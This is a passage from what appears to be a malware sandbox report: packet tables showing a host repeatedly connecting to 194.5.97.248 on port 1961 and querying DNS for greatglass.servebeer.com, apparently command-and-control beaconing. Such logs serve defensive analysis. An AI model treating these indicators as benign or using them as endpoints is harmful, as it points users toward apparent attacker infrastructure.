Feb 22, 2021 13:59:16.253457069 CET	49800	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:59:16.303750992 CET	1961	49800	194.5.97.248	192.168.2.4
Feb 22, 2021 13:59:17.420805931 CET	49801	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:59:17.470844030 CET	1961	49801	194.5.97.248	192.168.2.4
Feb 22, 2021 13:59:17.972326040 CET	49801	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:59:18.022787094 CET	1961	49801	194.5.97.248	192.168.2.4
Feb 22, 2021 13:59:18.534989119 CET	49801	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:59:18.584995031 CET	1961	49801	194.5.97.248	192.168.2.4
Feb 22, 2021 13:59:19.712188959 CET	49802	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:59:19.762264013 CET	1961	49802	194.5.97.248	192.168.2.4
Feb 22, 2021 13:59:20.269272089 CET	49802	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:59:20.319528103 CET	1961	49802	194.5.97.248	192.168.2.4
Feb 22, 2021 13:59:20.831820965 CET	49802	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:59:20.881704092 CET	1961	49802	194.5.97.248	192.168.2.4
Feb 22, 2021 13:59:22.050276041 CET	49804	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:59:22.100214005 CET	1961	49804	194.5.97.248	192.168.2.4
Feb 22, 2021 13:59:22.613282919 CET	49804	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:59:22.663464069 CET	1961	49804	194.5.97.248	192.168.2.4
Feb 22, 2021 13:59:23.175832987 CET	49804	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:59:23.227673054 CET	1961	49804	194.5.97.248	192.168.2.4
Feb 22, 2021 13:59:24.346683025 CET	49806	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:59:24.398341894 CET	1961	49806	194.5.97.248	192.168.2.4
Feb 22, 2021 13:59:24.910372019 CET	49806	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:59:24.962460041 CET	1961	49806	194.5.97.248	192.168.2.4
Feb 22, 2021 13:59:25.472907066 CET	49806	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:59:25.522816896 CET	1961	49806	194.5.97.248	192.168.2.4
Feb 22, 2021 13:59:26.640094042 CET	49807	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:59:26.690135956 CET	1961	49807	194.5.97.248	192.168.2.4
Feb 22, 2021 13:59:27.191823006 CET	49807	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:59:27.241902113 CET	1961	49807	194.5.97.248	192.168.2.4
Feb 22, 2021 13:59:27.754403114 CET	49807	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:59:27.804496050 CET	1961	49807	194.5.97.248	192.168.2.4
Feb 22, 2021 13:59:28.917356968 CET	49808	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:59:28.967200041 CET	1961	49808	194.5.97.248	192.168.2.4
Feb 22, 2021 13:59:29.473315001 CET	49808	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:59:29.523384094 CET	1961	49808	194.5.97.248	192.168.2.4
Feb 22, 2021 13:59:30.035711050 CET	49808	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:59:30.087172985 CET	1961	49808	194.5.97.248	192.168.2.4
Feb 22, 2021 13:59:31.209254980 CET	49809	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:59:31.259326935 CET	1961	49809	194.5.97.248	192.168.2.4
Feb 22, 2021 13:59:31.770308018 CET	49809	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:59:31.820688963 CET	1961	49809	194.5.97.248	192.168.2.4
Feb 22, 2021 13:59:32.332864046 CET	49809	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:59:32.383027077 CET	1961	49809	194.5.97.248	192.168.2.4
Feb 22, 2021 13:59:33.509232998 CET	49810	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:59:33.559355974 CET	1961	49810	194.5.97.248	192.168.2.4
Feb 22, 2021 13:59:34.067363977 CET	49810	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:59:34.117434978 CET	1961	49810	194.5.97.248	192.168.2.4
Feb 22, 2021 13:59:34.630105019 CET	49810	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:59:34.680438042 CET	1961	49810	194.5.97.248	192.168.2.4
Feb 22, 2021 13:59:35.804946899 CET	49811	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:59:35.854857922 CET	1961	49811	194.5.97.248	192.168.2.4
Feb 22, 2021 13:59:36.364398956 CET	49811	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:59:36.414602041 CET	1961	49811	194.5.97.248	192.168.2.4
Feb 22, 2021 13:59:36.927084923 CET	49811	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:59:36.977094889 CET	1961	49811	194.5.97.248	192.168.2.4
Feb 22, 2021 13:59:38.109721899 CET	49812	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:59:38.159822941 CET	1961	49812	194.5.97.248	192.168.2.4
Feb 22, 2021 13:59:38.661551952 CET	49812	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:59:38.712600946 CET	1961	49812	194.5.97.248	192.168.2.4
Feb 22, 2021 13:59:39.223989010 CET	49812	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:59:39.274080992 CET	1961	49812	194.5.97.248	192.168.2.4
Feb 22, 2021 13:59:40.402884007 CET	49813	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:59:40.456190109 CET	1961	49813	194.5.97.248	192.168.2.4
Feb 22, 2021 13:59:40.958667040 CET	49813	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:59:41.011187077 CET	1961	49813	194.5.97.248	192.168.2.4
Feb 22, 2021 13:59:41.521106958 CET	49813	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:59:41.575130939 CET	1961	49813	194.5.97.248	192.168.2.4
Feb 22, 2021 13:59:42.634627104 CET	49814	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:59:42.684803963 CET	1961	49814	194.5.97.248	192.168.2.4
Feb 22, 2021 13:59:43.193125010 CET	49814	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:59:43.243324995 CET	1961	49814	194.5.97.248	192.168.2.4
Feb 22, 2021 13:59:43.755645037 CET	49814	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:59:43.807684898 CET	1961	49814	194.5.97.248	192.168.2.4
Feb 22, 2021 13:59:44.886141062 CET	49815	1961	192.168.2.4	194.5.97.248
Feb 22, 2021 13:59:44.938203096 CET	1961	49815	194.5.97.248	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 22, 2021 13:57:30.884157896 CET	65248	53	192.168.2.4	8.8.8.8
Feb 22, 2021 13:57:30.932887077 CET	53	65248	8.8.8.8	192.168.2.4
Feb 22, 2021 13:57:31.995923996 CET	53723	53	192.168.2.4	8.8.8.8
Feb 22, 2021 13:57:32.044653893 CET	53	53723	8.8.8.8	192.168.2.4
Feb 22, 2021 13:57:32.189984083 CET	64646	53	192.168.2.4	8.8.8.8
Feb 22, 2021 13:57:32.241077900 CET	53	64646	8.8.8.8	192.168.2.4
Feb 22, 2021 13:57:32.368320942 CET	65298	53	192.168.2.4	8.8.8.8
Feb 22, 2021 13:57:32.416887999 CET	53	65298	8.8.8.8	192.168.2.4
Feb 22, 2021 13:57:32.958420038 CET	59123	53	192.168.2.4	8.8.8.8
Feb 22, 2021 13:57:33.007092953 CET	53	59123	8.8.8.8	192.168.2.4
Feb 22, 2021 13:57:33.925764084 CET	54531	53	192.168.2.4	8.8.8.8
Feb 22, 2021 13:57:33.977324009 CET	53	54531	8.8.8.8	192.168.2.4
Feb 22, 2021 13:57:34.594816923 CET	49714	53	192.168.2.4	8.8.8.8
Feb 22, 2021 13:57:34.653037071 CET	53	49714	8.8.8.8	192.168.2.4
Feb 22, 2021 13:57:35.155740023 CET	58028	53	192.168.2.4	8.8.8.8
Feb 22, 2021 13:57:35.207124949 CET	53	58028	8.8.8.8	192.168.2.4
Feb 22, 2021 13:57:36.390825987 CET	53097	53	192.168.2.4	8.8.8.8
Feb 22, 2021 13:57:36.448599100 CET	53	53097	8.8.8.8	192.168.2.4
Feb 22, 2021 13:57:37.644206047 CET	49257	53	192.168.2.4	8.8.8.8
Feb 22, 2021 13:57:37.694472075 CET	53	49257	8.8.8.8	192.168.2.4
Feb 22, 2021 13:57:38.995876074 CET	62389	53	192.168.2.4	8.8.8.8
Feb 22, 2021 13:57:39.047319889 CET	53	62389	8.8.8.8	192.168.2.4
Feb 22, 2021 13:57:40.487632036 CET	49910	53	192.168.2.4	8.8.8.8
Feb 22, 2021 13:57:40.536463976 CET	53	49910	8.8.8.8	192.168.2.4
Feb 22, 2021 13:57:41.704668045 CET	55854	53	192.168.2.4	8.8.8.8
Feb 22, 2021 13:57:41.756934881 CET	53	55854	8.8.8.8	192.168.2.4
Feb 22, 2021 13:57:43.046756029 CET	64549	53	192.168.2.4	8.8.8.8
Feb 22, 2021 13:57:43.100265026 CET	53	64549	8.8.8.8	192.168.2.4
Feb 22, 2021 13:57:43.281383991 CET	63153	53	192.168.2.4	8.8.8.8
Feb 22, 2021 13:57:43.340078115 CET	53	63153	8.8.8.8	192.168.2.4
Feb 22, 2021 13:57:44.232898951 CET	52991	53	192.168.2.4	8.8.8.8
Feb 22, 2021 13:57:44.281585932 CET	53	52991	8.8.8.8	192.168.2.4
Feb 22, 2021 13:57:45.437531948 CET	53700	53	192.168.2.4	8.8.8.8
Feb 22, 2021 13:57:45.490942001 CET	53	53700	8.8.8.8	192.168.2.4
Feb 22, 2021 13:57:45.782011986 CET	51726	53	192.168.2.4	8.8.8.8
Feb 22, 2021 13:57:45.843770027 CET	53	51726	8.8.8.8	192.168.2.4
Feb 22, 2021 13:57:46.696166992 CET	56794	53	192.168.2.4	8.8.8.8
Feb 22, 2021 13:57:46.744786024 CET	53	56794	8.8.8.8	192.168.2.4
Feb 22, 2021 13:57:47.899638891 CET	56534	53	192.168.2.4	8.8.8.8
Feb 22, 2021 13:57:47.954885960 CET	53	56534	8.8.8.8	192.168.2.4
Feb 22, 2021 13:57:48.295202017 CET	56627	53	192.168.2.4	8.8.8.8
Feb 22, 2021 13:57:48.358426094 CET	53	56627	8.8.8.8	192.168.2.4
Feb 22, 2021 13:57:48.874819040 CET	56621	53	192.168.2.4	8.8.8.8
Feb 22, 2021 13:57:48.925355911 CET	53	56621	8.8.8.8	192.168.2.4
Feb 22, 2021 13:57:50.140919924 CET	63116	53	192.168.2.4	8.8.8.8
Feb 22, 2021 13:57:50.189668894 CET	53	63116	8.8.8.8	192.168.2.4
Feb 22, 2021 13:57:50.736525059 CET	64078	53	192.168.2.4	8.8.8.8
Feb 22, 2021 13:57:50.798317909 CET	53	64078	8.8.8.8	192.168.2.4
Feb 22, 2021 13:57:51.098829985 CET	64801	53	192.168.2.4	8.8.8.8
Feb 22, 2021 13:57:51.147923946 CET	53	64801	8.8.8.8	192.168.2.4
Feb 22, 2021 13:57:53.005208015 CET	61721	53	192.168.2.4	8.8.8.8
Feb 22, 2021 13:57:53.067468882 CET	53	61721	8.8.8.8	192.168.2.4
Feb 22, 2021 13:57:53.163702011 CET	51255	53	192.168.2.4	8.8.8.8
Feb 22, 2021 13:57:53.215184927 CET	53	51255	8.8.8.8	192.168.2.4
Feb 22, 2021 13:57:54.339315891 CET	61522	53	192.168.2.4	8.8.8.8
Feb 22, 2021 13:57:54.391067982 CET	53	61522	8.8.8.8	192.168.2.4
Feb 22, 2021 13:57:55.282325029 CET	52337	53	192.168.2.4	8.8.8.8
Feb 22, 2021 13:57:55.343982935 CET	53	52337	8.8.8.8	192.168.2.4
Feb 22, 2021 13:57:57.862533092 CET	55046	53	192.168.2.4	8.8.8.8
Feb 22, 2021 13:57:57.912153006 CET	53	55046	8.8.8.8	192.168.2.4
Feb 22, 2021 13:58:00.124687910 CET	49612	53	192.168.2.4	8.8.8.8
Feb 22, 2021 13:58:00.184590101 CET	53	49612	8.8.8.8	192.168.2.4
Feb 22, 2021 13:58:02.406542063 CET	49285	53	192.168.2.4	8.8.8.8
Feb 22, 2021 13:58:02.469014883 CET	53	49285	8.8.8.8	192.168.2.4
Feb 22, 2021 13:58:04.680299044 CET	50601	53	192.168.2.4	8.8.8.8
Feb 22, 2021 13:58:04.741290092 CET	53	50601	8.8.8.8	192.168.2.4
Feb 22, 2021 13:58:06.359139919 CET	60875	53	192.168.2.4	8.8.8.8
Feb 22, 2021 13:58:06.407919884 CET	53	60875	8.8.8.8	192.168.2.4
Feb 22, 2021 13:58:06.964596033 CET	56448	53	192.168.2.4	8.8.8.8
Feb 22, 2021 13:58:07.023207903 CET	53	56448	8.8.8.8	192.168.2.4
Feb 22, 2021 13:58:09.238373041 CET	59172	53	192.168.2.4	8.8.8.8
Feb 22, 2021 13:58:09.295730114 CET	53	59172	8.8.8.8	192.168.2.4
Feb 22, 2021 13:58:11.507550955 CET	62420	53	192.168.2.4	8.8.8.8
Feb 22, 2021 13:58:11.565102100 CET	53	62420	8.8.8.8	192.168.2.4
Feb 22, 2021 13:58:14.141773939 CET	60579	53	192.168.2.4	8.8.8.8
Feb 22, 2021 13:58:14.198827982 CET	53	60579	8.8.8.8	192.168.2.4
Feb 22, 2021 13:58:16.668684959 CET	50183	53	192.168.2.4	8.8.8.8
Feb 22, 2021 13:58:16.730441093 CET	53	50183	8.8.8.8	192.168.2.4
Feb 22, 2021 13:58:19.152645111 CET	61531	53	192.168.2.4	8.8.8.8
Feb 22, 2021 13:58:19.201297045 CET	53	61531	8.8.8.8	192.168.2.4
Feb 22, 2021 13:58:21.412386894 CET	49228	53	192.168.2.4	8.8.8.8
Feb 22, 2021 13:58:21.469583988 CET	53	49228	8.8.8.8	192.168.2.4
Feb 22, 2021 13:58:23.686291933 CET	59794	53	192.168.2.4	8.8.8.8
Feb 22, 2021 13:58:23.743386030 CET	53	59794	8.8.8.8	192.168.2.4
Feb 22, 2021 13:58:25.964018106 CET	55916	53	192.168.2.4	8.8.8.8
Feb 22, 2021 13:58:26.021049976 CET	53	55916	8.8.8.8	192.168.2.4
Feb 22, 2021 13:58:26.651815891 CET	52752	53	192.168.2.4	8.8.8.8
Feb 22, 2021 13:58:26.705871105 CET	53	52752	8.8.8.8	192.168.2.4
Feb 22, 2021 13:58:26.998788118 CET	60542	53	192.168.2.4	8.8.8.8
Feb 22, 2021 13:58:27.074356079 CET	53	60542	8.8.8.8	192.168.2.4
Feb 22, 2021 13:58:28.138034105 CET	60689	53	192.168.2.4	8.8.8.8
Feb 22, 2021 13:58:28.246357918 CET	53	60689	8.8.8.8	192.168.2.4
Feb 22, 2021 13:58:28.293483019 CET	64206	53	192.168.2.4	8.8.8.8
Feb 22, 2021 13:58:28.345366955 CET	53	64206	8.8.8.8	192.168.2.4
Feb 22, 2021 13:58:28.834017992 CET	50904	53	192.168.2.4	8.8.8.8
Feb 22, 2021 13:58:28.893484116 CET	53	50904	8.8.8.8	192.168.2.4
Feb 22, 2021 13:58:29.362914085 CET	57525	53	192.168.2.4	8.8.8.8
Feb 22, 2021 13:58:29.420852900 CET	53	57525	8.8.8.8	192.168.2.4
Feb 22, 2021 13:58:30.026035070 CET	53814	53	192.168.2.4	8.8.8.8
Feb 22, 2021 13:58:30.029351950 CET	53418	53	192.168.2.4	8.8.8.8
Feb 22, 2021 13:58:30.101344109 CET	53	53418	8.8.8.8	192.168.2.4
Feb 22, 2021 13:58:30.105496883 CET	53	53814	8.8.8.8	192.168.2.4
Feb 22, 2021 13:58:30.669245958 CET	62833	53	192.168.2.4	8.8.8.8
Feb 22, 2021 13:58:30.729173899 CET	53	62833	8.8.8.8	192.168.2.4
Feb 22, 2021 13:58:30.732491970 CET	59260	53	192.168.2.4	8.8.8.8
Feb 22, 2021 13:58:30.781126022 CET	53	59260	8.8.8.8	192.168.2.4
Feb 22, 2021 13:58:31.304718971 CET	49944	53	192.168.2.4	8.8.8.8
Feb 22, 2021 13:58:31.385407925 CET	53	49944	8.8.8.8	192.168.2.4
Feb 22, 2021 13:58:32.175874949 CET	63300	53	192.168.2.4	8.8.8.8
Feb 22, 2021 13:58:32.235533953 CET	53	63300	8.8.8.8	192.168.2.4
Feb 22, 2021 13:58:33.089649916 CET	61449	53	192.168.2.4	8.8.8.8
Feb 22, 2021 13:58:33.137404919 CET	51275	53	192.168.2.4	8.8.8.8
Feb 22, 2021 13:58:33.146944046 CET	53	61449	8.8.8.8	192.168.2.4
Feb 22, 2021 13:58:33.194329977 CET	53	51275	8.8.8.8	192.168.2.4
Feb 22, 2021 13:58:33.689402103 CET	63492	53	192.168.2.4	8.8.8.8
Feb 22, 2021 13:58:33.752295971 CET	53	63492	8.8.8.8	192.168.2.4
Feb 22, 2021 13:58:35.352124929 CET	58945	53	192.168.2.4	8.8.8.8
Feb 22, 2021 13:58:35.408977985 CET	53	58945	8.8.8.8	192.168.2.4
Feb 22, 2021 13:58:37.617449045 CET	60779	53	192.168.2.4	8.8.8.8
Feb 22, 2021 13:58:37.674660921 CET	53	60779	8.8.8.8	192.168.2.4
Feb 22, 2021 13:58:39.893341064 CET	64014	53	192.168.2.4	8.8.8.8
Feb 22, 2021 13:58:39.944017887 CET	53	64014	8.8.8.8	192.168.2.4
Feb 22, 2021 13:58:42.163970947 CET	57091	53	192.168.2.4	8.8.8.8
Feb 22, 2021 13:58:42.197487116 CET	55904	53	192.168.2.4	8.8.8.8
Feb 22, 2021 13:58:42.212634087 CET	53	57091	8.8.8.8	192.168.2.4
Feb 22, 2021 13:58:42.246172905 CET	53	55904	8.8.8.8	192.168.2.4
Feb 22, 2021 13:58:42.406217098 CET	52109	53	192.168.2.4	8.8.8.8
Feb 22, 2021 13:58:42.466309071 CET	53	52109	8.8.8.8	192.168.2.4
Feb 22, 2021 13:58:44.456279039 CET	54450	53	192.168.2.4	8.8.8.8
Feb 22, 2021 13:58:44.507868052 CET	53	54450	8.8.8.8	192.168.2.4
Feb 22, 2021 13:58:45.970840931 CET	49374	53	192.168.2.4	8.8.8.8
Feb 22, 2021 13:58:46.030608892 CET	53	49374	8.8.8.8	192.168.2.4
Feb 22, 2021 13:58:46.754059076 CET	50436	53	192.168.2.4	8.8.8.8
Feb 22, 2021 13:58:46.812547922 CET	53	50436	8.8.8.8	192.168.2.4
Feb 22, 2021 13:58:49.044269085 CET	62605	53	192.168.2.4	8.8.8.8
Feb 22, 2021 13:58:49.105220079 CET	53	62605	8.8.8.8	192.168.2.4
Feb 22, 2021 13:58:51.340818882 CET	54256	53	192.168.2.4	8.8.8.8
Feb 22, 2021 13:58:51.406141996 CET	53	54256	8.8.8.8	192.168.2.4
Feb 22, 2021 13:58:53.647906065 CET	52189	53	192.168.2.4	8.8.8.8
Feb 22, 2021 13:58:53.708487034 CET	53	52189	8.8.8.8	192.168.2.4
Feb 22, 2021 13:58:55.943375111 CET	56131	53	192.168.2.4	8.8.8.8
Feb 22, 2021 13:58:56.003597975 CET	53	56131	8.8.8.8	192.168.2.4
Feb 22, 2021 13:58:58.224080086 CET	62992	53	192.168.2.4	8.8.8.8
Feb 22, 2021 13:58:58.276984930 CET	53	62992	8.8.8.8	192.168.2.4
Feb 22, 2021 13:59:00.499053955 CET	54432	53	192.168.2.4	8.8.8.8
Feb 22, 2021 13:59:00.550509930 CET	53	54432	8.8.8.8	192.168.2.4
Feb 22, 2021 13:59:02.975363016 CET	57227	53	192.168.2.4	8.8.8.8
Feb 22, 2021 13:59:03.037074089 CET	53	57227	8.8.8.8	192.168.2.4
Feb 22, 2021 13:59:05.908447981 CET	58383	53	192.168.2.4	8.8.8.8
Feb 22, 2021 13:59:05.966707945 CET	53	58383	8.8.8.8	192.168.2.4
Feb 22, 2021 13:59:08.214849949 CET	63136	53	192.168.2.4	8.8.8.8
Feb 22, 2021 13:59:08.274915934 CET	53	63136	8.8.8.8	192.168.2.4
Feb 22, 2021 13:59:10.491177082 CET	50911	53	192.168.2.4	8.8.8.8
Feb 22, 2021 13:59:10.552557945 CET	53	50911	8.8.8.8	192.168.2.4
Feb 22, 2021 13:59:12.773044109 CET	63409	53	192.168.2.4	8.8.8.8
Feb 22, 2021 13:59:12.830398083 CET	53	63409	8.8.8.8	192.168.2.4
Feb 22, 2021 13:59:15.077661991 CET	59185	53	192.168.2.4	8.8.8.8
Feb 22, 2021 13:59:15.137773037 CET	53	59185	8.8.8.8	192.168.2.4
Feb 22, 2021 13:59:17.362710953 CET	64236	53	192.168.2.4	8.8.8.8
Feb 22, 2021 13:59:17.419770002 CET	53	64236	8.8.8.8	192.168.2.4
Feb 22, 2021 13:59:19.654303074 CET	56157	53	192.168.2.4	8.8.8.8
Feb 22, 2021 13:59:19.711353064 CET	53	56157	8.8.8.8	192.168.2.4
Feb 22, 2021 13:59:20.151802063 CET	55601	53	192.168.2.4	8.8.8.8
Feb 22, 2021 13:59:20.200400114 CET	53	55601	8.8.8.8	192.168.2.4
Feb 22, 2021 13:59:21.991266966 CET	52984	53	192.168.2.4	8.8.8.8
Feb 22, 2021 13:59:22.049139977 CET	53	52984	8.8.8.8	192.168.2.4
Feb 22, 2021 13:59:22.722409964 CET	51141	53	192.168.2.4	8.8.8.8
Feb 22, 2021 13:59:22.779922009 CET	53	51141	8.8.8.8	192.168.2.4
Feb 22, 2021 13:59:24.288728952 CET	53610	53	192.168.2.4	8.8.8.8
Feb 22, 2021 13:59:24.345722914 CET	53	53610	8.8.8.8	192.168.2.4
Feb 22, 2021 13:59:26.587452888 CET	61247	53	192.168.2.4	8.8.8.8
Feb 22, 2021 13:59:26.639040947 CET	53	61247	8.8.8.8	192.168.2.4
Feb 22, 2021 13:59:28.864841938 CET	65165	53	192.168.2.4	8.8.8.8
Feb 22, 2021 13:59:28.916455030 CET	53	65165	8.8.8.8	192.168.2.4
Feb 22, 2021 13:59:31.158606052 CET	52076	53	192.168.2.4	8.8.8.8
Feb 22, 2021 13:59:31.207633972 CET	53	52076	8.8.8.8	192.168.2.4
Feb 22, 2021 13:59:33.446224928 CET	54903	53	192.168.2.4	8.8.8.8
Feb 22, 2021 13:59:33.507658005 CET	53	54903	8.8.8.8	192.168.2.4
Feb 22, 2021 13:59:35.753556967 CET	55045	53	192.168.2.4	8.8.8.8
Feb 22, 2021 13:59:35.802786112 CET	53	55045	8.8.8.8	192.168.2.4
Feb 22, 2021 13:59:38.046181917 CET	54464	53	192.168.2.4	8.8.8.8
Feb 22, 2021 13:59:38.108414888 CET	53	54464	8.8.8.8	192.168.2.4
Feb 22, 2021 13:59:40.350781918 CET	50970	53	192.168.2.4	8.8.8.8
Feb 22, 2021 13:59:40.401925087 CET	53	50970	8.8.8.8	192.168.2.4
Feb 22, 2021 13:59:42.585230112 CET	55261	53	192.168.2.4	8.8.8.8
Feb 22, 2021 13:59:42.634088993 CET	53	55261	8.8.8.8	192.168.2.4
Feb 22, 2021 13:59:44.822701931 CET	59809	53	192.168.2.4	8.8.8.8
Feb 22, 2021 13:59:44.885376930 CET	53	59809	8.8.8.8	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Feb 22, 2021 13:57:43.281383991 CET	192.168.2.4	8.8.8.8	0xde5a	Standard query (0)	greatglass.servebeer.com	A (IP address)	IN (0x0001)
Feb 22, 2021 13:57:45.782011986 CET	192.168.2.4	8.8.8.8	0x4f79	Standard query (0)	greatglass.servebeer.com	A (IP address)	IN (0x0001)
Feb 22, 2021 13:57:48.295202017 CET	192.168.2.4	8.8.8.8	0x76a7	Standard query (0)	greatglass.servebeer.com	A (IP address)	IN (0x0001)
Feb 22, 2021 13:57:50.736525059 CET	192.168.2.4	8.8.8.8	0x4057	Standard query (0)	greatglass.servebeer.com	A (IP address)	IN (0x0001)
Feb 22, 2021 13:57:53.005208015 CET	192.168.2.4	8.8.8.8	0xfcc3	Standard query (0)	greatglass.servebeer.com	A (IP address)	IN (0x0001)
Feb 22, 2021 13:57:55.282325029 CET	192.168.2.4	8.8.8.8	0x8df4	Standard query (0)	greatglass.servebeer.com	A (IP address)	IN (0x0001)
Feb 22, 2021 13:57:57.862533092 CET	192.168.2.4	8.8.8.8	0xfc4a	Standard query (0)	greatglass.servebeer.com	A (IP address)	IN (0x0001)
Feb 22, 2021 13:58:00.124687910 CET	192.168.2.4	8.8.8.8	0x18e3	Standard query (0)	greatglass.servebeer.com	A (IP address)	IN (0x0001)
Feb 22, 2021 13:58:02.406542063 CET	192.168.2.4	8.8.8.8	0x2294	Standard query (0)	greatglass.servebeer.com	A (IP address)	IN (0x0001)
Feb 22, 2021 13:58:04.680299044 CET	192.168.2.4	8.8.8.8	0x81e4	Standard query (0)	greatglass.servebeer.com	A (IP address)	IN (0x0001)
Feb 22, 2021 13:58:06.964596033 CET	192.168.2.4	8.8.8.8	0x4364	Standard query (0)	greatglass.servebeer.com	A (IP address)	IN (0x0001)
Feb 22, 2021 13:58:09.238373041 CET	192.168.2.4	8.8.8.8	0xcbb9	Standard query (0)	greatglass.servebeer.com	A (IP address)	IN (0x0001)
Feb 22, 2021 13:58:11.507550955 CET	192.168.2.4	8.8.8.8	0x3f87	Standard query (0)	greatglass.servebeer.com	A (IP address)	IN (0x0001)
Feb 22, 2021 13:58:14.141773939 CET	192.168.2.4	8.8.8.8	0x7c01	Standard query (0)	greatglass.servebeer.com	A (IP address)	IN (0x0001)
Feb 22, 2021 13:58:16.668684959 CET	192.168.2.4	8.8.8.8	0x4ec5	Standard query (0)	greatglass.servebeer.com	A (IP address)	IN (0x0001)
Feb 22, 2021 13:58:19.152645111 CET	192.168.2.4	8.8.8.8	0x4332	Standard query (0)	greatglass.servebeer.com	A (IP address)	IN (0x0001)
Feb 22, 2021 13:58:21.412386894 CET	192.168.2.4	8.8.8.8	0xf26c	Standard query (0)	greatglass.servebeer.com	A (IP address)	IN (0x0001)
Feb 22, 2021 13:58:23.686291933 CET	192.168.2.4	8.8.8.8	0xef30	Standard query (0)	greatglass.servebeer.com	A (IP address)	IN (0x0001)
Feb 22, 2021 13:58:25.964018106 CET	192.168.2.4	8.8.8.8	0xeef9	Standard query (0)	greatglass.servebeer.com	A (IP address)	IN (0x0001)
Feb 22, 2021 13:58:28.293483019 CET	192.168.2.4	8.8.8.8	0xa17b	Standard query (0)	greatglass.servebeer.com	A (IP address)	IN (0x0001)
Feb 22, 2021 13:58:30.732491970 CET	192.168.2.4	8.8.8.8	0xb344	Standard query (0)	greatglass.servebeer.com	A (IP address)	IN (0x0001)
Feb 22, 2021 13:58:33.089649916 CET	192.168.2.4	8.8.8.8	0x1aa5	Standard query (0)	greatglass.servebeer.com	A (IP address)	IN (0x0001)
Feb 22, 2021 13:58:35.352124929 CET	192.168.2.4	8.8.8.8	0x326b	Standard query (0)	greatglass.servebeer.com	A (IP address)	IN (0x0001)
Feb 22, 2021 13:58:37.617449045 CET	192.168.2.4	8.8.8.8	0xf5f2	Standard query (0)	greatglass.servebeer.com	A (IP address)	IN (0x0001)
Feb 22, 2021 13:58:39.893341064 CET	192.168.2.4	8.8.8.8	0x3eb2	Standard query (0)	greatglass.servebeer.com	A (IP address)	IN (0x0001)
Feb 22, 2021 13:58:42.163970947 CET	192.168.2.4	8.8.8.8	0x71df	Standard query (0)	greatglass.servebeer.com	A (IP address)	IN (0x0001)
Feb 22, 2021 13:58:44.456279039 CET	192.168.2.4	8.8.8.8	0xd87	Standard query (0)	greatglass.servebeer.com	A (IP address)	IN (0x0001)
Feb 22, 2021 13:58:46.754059076 CET	192.168.2.4	8.8.8.8	0xb6f8	Standard query (0)	greatglass.servebeer.com	A (IP address)	IN (0x0001)
Feb 22, 2021 13:58:49.044269085 CET	192.168.2.4	8.8.8.8	0xbe80	Standard query (0)	greatglass.servebeer.com	A (IP address)	IN (0x0001)
Feb 22, 2021 13:58:51.340818882 CET	192.168.2.4	8.8.8.8	0x7899	Standard query (0)	greatglass.servebeer.com	A (IP address)	IN (0x0001)
Feb 22, 2021 13:58:53.647906065 CET	192.168.2.4	8.8.8.8	0xf149	Standard query (0)	greatglass.servebeer.com	A (IP address)	IN (0x0001)
Feb 22, 2021 13:58:55.943375111 CET	192.168.2.4	8.8.8.8	0x2070	Standard query (0)	greatglass.servebeer.com	A (IP address)	IN (0x0001)
Feb 22, 2021 13:58:58.224080086 CET	192.168.2.4	8.8.8.8	0x43dc	Standard query (0)	greatglass.servebeer.com	A (IP address)	IN (0x0001)
Feb 22, 2021 13:59:00.499053955 CET	192.168.2.4	8.8.8.8	0x4f83	Standard query (0)	greatglass.servebeer.com	A (IP address)	IN (0x0001)
Feb 22, 2021 13:59:02.975363016 CET	192.168.2.4	8.8.8.8	0x27e1	Standard query (0)	greatglass.servebeer.com	A (IP address)	IN (0x0001)
Feb 22, 2021 13:59:05.908447981 CET	192.168.2.4	8.8.8.8	0x6128	Standard query (0)	greatglass.servebeer.com	A (IP address)	IN (0x0001)
Feb 22, 2021 13:59:08.214849949 CET	192.168.2.4	8.8.8.8	0x174f	Standard query (0)	greatglass.servebeer.com	A (IP address)	IN (0x0001)
Feb 22, 2021 13:59:10.491177082 CET	192.168.2.4	8.8.8.8	0x8d7	Standard query (0)	greatglass.servebeer.com	A (IP address)	IN (0x0001)
Feb 22, 2021 13:59:12.773044109 CET	192.168.2.4	8.8.8.8	0x3f68	Standard query (0)	greatglass.servebeer.com	A (IP address)	IN (0x0001)
